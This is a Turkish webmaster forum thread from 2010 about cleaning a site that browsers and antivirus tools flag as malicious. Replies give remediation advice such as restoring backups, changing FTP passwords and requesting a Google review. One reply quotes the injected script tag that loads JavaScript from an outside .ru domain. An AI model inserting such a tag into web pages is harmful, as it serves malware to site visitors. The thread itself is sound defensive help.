• 14-08-2010, 01:13:31
    #1
    Merhaba arkadaşlar.

    Şu adreste(EDIT: Sorun çözüldü, linki kaldırıldı.), chrome tarafından açıldığında zararlı içerik uyarısı veriyor. Ayrıyetten güncel antivirüs programları da virüs tespiti uyarısı yapıyor.

    Kodları allak bullak ettim ama bulamadım bir şey.

    Bu bela ile ilgili bilgisi olan varsa harika olur.

    Şimdiden teşekkürler.
  • 14-08-2010, 01:18:07
    #2
    Üyeliği durduruldu
    Host firmanızla görüşün, sorunun olamdığı bir zamana geri yükleme yapıp sistemin güncel halini yedek alın derim. FTP bağlantısı yaptığınız infected bir bilgisayardan v.s. bulaşmış oalbilir. Goolge webmaster araçları kullanıyorsanız geri yükleme ile temizleme işlemi yaptıktan sonra webmaster araçları üzerinden kötü niyetli yazılım bölümünden bildirim yollayın temizledim diye, inceleyip kaldırsınlar uyarıyı. Bağlantı yaptığınız bilgisayarlara dikkat edin.

    Benim de başıma gelmişti, bu şekilde çözmüştüm. Üstelik infected bir makineden ftp bağlantısı yaptığım9 sitede bu sorun vardı, bu şekilde çözdüm hocam. Umarım iş görür.
  • 14-08-2010, 01:18:14
    #3
    Kimlik doğrulama veya yönetimden onay bekliyor.
    hocam herhangi bir uyarı vermedi bende :S
  • 14-08-2010, 01:27:55
    #4
    PuMaX adlı üyeden alıntı: mesajı görüntüle
    Host firmanızla görüşün, sorunun olamdığı bir zamana geri yükleme yapıp sistemin güncel halini yedek alın derim. FTP bağlantısı yaptığınız infected bir bilgisayardan v.s. bulaşmış oalbilir. Goolge webmaster araçları kullanıyorsanız geri yükleme ile temizleme işlemi yaptıktan sonra webmaster araçları üzerinden kötü niyetli yazılım bölümünden bildirim yollayın temizledim diye, inceleyip kaldırsınlar uyarıyı. Bağlantı yaptığınız bilgisayarlara dikkat edin.

    Benim de başıma gelmişti, bu şekilde çözmüştüm. Üstelik infected bir makineden ftp bağlantısı yaptığım9 sitede bu sorun vardı, bu şekilde çözdüm hocam. Umarım iş görür.
    Önerileriniz için teşekkürler. Domaine bir bakarsanız hostinglik bir durum olmadığını göreceksiniz. Sistem devamlı geliştirilmekte olduğundan yedekleri yüklemek gibi bir seçeneğim yok malesef. Virüs kaynağını bulup temizlemem gerekiyor. Bunun için bir öneriniz varsa pek makbul geçer.


    _BuKi_ adlı üyeden alıntı: mesajı görüntüle
    hocam herhangi bir uyarı vermedi bende :S
    Durumu gösteren bir pm attım hocam.
  • 14-08-2010, 01:28:07
    #5
    sitenin en altında, indexin altında ya da foofterda olabilir

    Alıntı
    <script type="text/javascript" src="http://riotassistance.ru/E-mail.js"></script>
    bu kod güvenlik uyarısı veriyor.
    Temizle, JS dosyalarını da kontrol et, genellikle en altına kendisini ekler, oraları da temizle, şifrelerini deiştir ve FTP programı kullanma...
  • 14-08-2010, 01:35:18
    #6
    kaberdey adlı üyeden alıntı: mesajı görüntüle
    sitenin en altında, indexin altında ya da foofterda olabilir


    bu kod güvenlik uyarısı veriyor.
    Temizle, JS dosyalarını da kontrol et, genellikle en altına kendisini ekler, oraları da temizle, şifrelerini deiştir ve FTP programı kullanma...
    Harikasın hocam. Çok çok teşekkürler. Zararlı kodu kaldırdım.
    Daima Filezilla kullanıyorum. Hiç böyle bir problemle karşılaşmamıştım. Şu an kullandığım bilgisayar yeni. Bir kaç gün antivirüssüz kullandım, o ara problem oldu sanırım. FTP erişim bilgilerini değiştirmek gerekir mi? Bir de bu google chrome'un damgasından nasıl kurtulabilirim?
  • 14-08-2010, 01:38:29
    #7
    akadal34 adlı üyeden alıntı: mesajı görüntüle
    Harikasın hocam. Çok çok teşekkürler. Zararlı kodu kaldırdım.
    Daima Filezilla kullanıyorum. Hiç böyle bir problemle karşılaşmamıştım. Şu an kullandığım bilgisayar yeni. Bir kaç gün antivirüssüz kullandım, o ara problem oldu sanırım. FTP erişim bilgilerini değiştirmek gerekir mi? Bir de bu google chrome'un damgasından nasıl kurtulabilirim?
    hocam web yöneticisi araçlarından siteyi tekrar incelemeleri için istek gönderin. En kısa zamanda sitenizi inceleyip zararlı yazısını kaldırıyorlar. Geçmiş olsun.
  • 14-08-2010, 01:41:29
    #8
    Filezilla şifreleri kayıt eder maalesef bilg giren virüs bu şifreleri kullanır. Şifreni değiştirip yine filezilla ile girersen aynı durumla karşılaşırsın. Sana önerim direk olarak explorer penceresinden (ftp adresini kullanarak) girmendir.

    NOT zararlı kod .JS uzantılı dosyalrın içerisinde de olabilir, ve kendisini tekrar yazar onarı da elden geçir.

    Chrome damgası için google'dan yeniden değerlendirme talebinde bulunman gerekiyor...
  • 14-08-2010, 01:43:08
    #9
    bende de bir uyarı vermedi.
    Hangi sayfada veriyor uyarıyı ?